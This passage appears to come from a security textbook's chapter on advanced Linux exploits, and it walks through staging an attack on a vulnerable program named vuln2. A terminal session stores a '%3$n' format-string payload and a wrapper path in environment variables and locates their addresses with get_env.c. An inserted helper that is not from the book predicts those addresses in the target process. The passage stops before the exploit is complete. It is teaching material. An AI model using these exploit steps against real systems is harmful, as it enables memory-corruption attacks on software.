Exit anyway? (y or n) y
BT book $
We will use the environment section of memory to store our strings and retrieve their
location with our handy get_env.c utility.
BT book $ cat get_env.c
//get_env.c
#include <stdio.h>
#include <stdlib.h>
int main(int argc, char *argv[]){
char * addr; //pointer that will receive the address of the variable's value
if(argc < 2){ printf("usage: %s VARNAME\n", argv[0]); return 1; } //need a variable name
addr = getenv(argv[1]); //look the variable up in the environment
printf("%s is located at %p\n", argv[1], addr);//display location
return 0;
}
Chapter 8: Advanced Linux Exploits
Remember that the compiled get_env binary needs a name of the same length as the vulnerable
program's name, in this case vuln2 (5 chars), because the program name sits on the stack
above the environment and shifts every address below it; that is why it is compiled as gtenv.
BT book $ gcc -o gtenv get_env.c
Okay, we are ready to place the strings into memory and retrieve their locations.
BT book $ export FMTSTR="%3\$n" //escape the $ with a backslash
BT book $ echo $FMTSTR
%3$n
BT book $ ./gtenv FMTSTR
FMTSTR is located at 0xbffffde5
BT book $
BT book $ export WRAPPER="./wrapper"
BT book $ echo $WRAPPER
./wrapper
BT book $ ./gtenv WRAPPER
WRAPPER is located at 0xbffffe02
BT book $
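As an added example (not code from the book), here is a variant of get_env.c that removes the need to match the program-name length by hand: it takes the target's name as a second argument and applies the classic two-bytes-per-character correction (the program name is stored twice near the top of the stack). It assumes ASLR is off and that the helper and the target are launched from the same directory with the same environment; the target name must be given exactly as the target's argv[0] will appear (for example ./vuln2 versus vuln2), since that is the string whose length matters.

```c
/* Added example, not from the book: get_env.c with a program-name-length
 * correction. Assumes no ASLR, identical environment and working directory,
 * and that target_name matches the target's argv[0] exactly. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Predict the address of VAR's value inside a process whose argv[0] is
 * target_name, given that this helper is currently running as self_name.
 * Returns 0 when VAR is not set in the environment. */
uintptr_t env_addr_for_target(const char *var, const char *self_name,
                              const char *target_name)
{
    char *val = getenv(var);
    if (val == NULL)
        return 0;
    /* Each extra byte in our own name pushes the environment block two bytes
     * lower than it will sit in the target (the name is stored twice), and
     * each missing byte pushes it two bytes higher. */
    long delta = (long)strlen(self_name) - (long)strlen(target_name);
    return (uintptr_t)((intptr_t)val + 2 * delta);
}

int main(int argc, char *argv[])
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s VARNAME TARGET_PROGRAM_NAME\n", argv[0]);
        return 1;
    }
    uintptr_t addr = env_addr_for_target(argv[1], argv[0], argv[2]);
    if (addr == 0) {
        fprintf(stderr, "%s is not set in the environment\n", argv[1]);
        return 1;
    }
    printf("%s will be located at 0x%lx in %s\n",
           argv[1], (unsigned long)addr, argv[2]);
    return 0;
}
```

Usage: `export FMTSTR="%3\$n"` and then `./get_env FMTSTR ./vuln2`; because the helper passes its own argv[0] as self_name, the correction is right whatever name it was compiled under. Verify the prediction once in gdb against the real target before relying on it, since anything that changes the environment or the launch path (a wrapper, a different shell, an extra variable) moves the address.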
We have everything except the location of the last memory slot of our buffer. To determine
this value, first we find the size of the vulnerable buffer. With this simple program,
we only have one internal buffer, which will be located at the top of the stack when
inside the vulnerable function (main).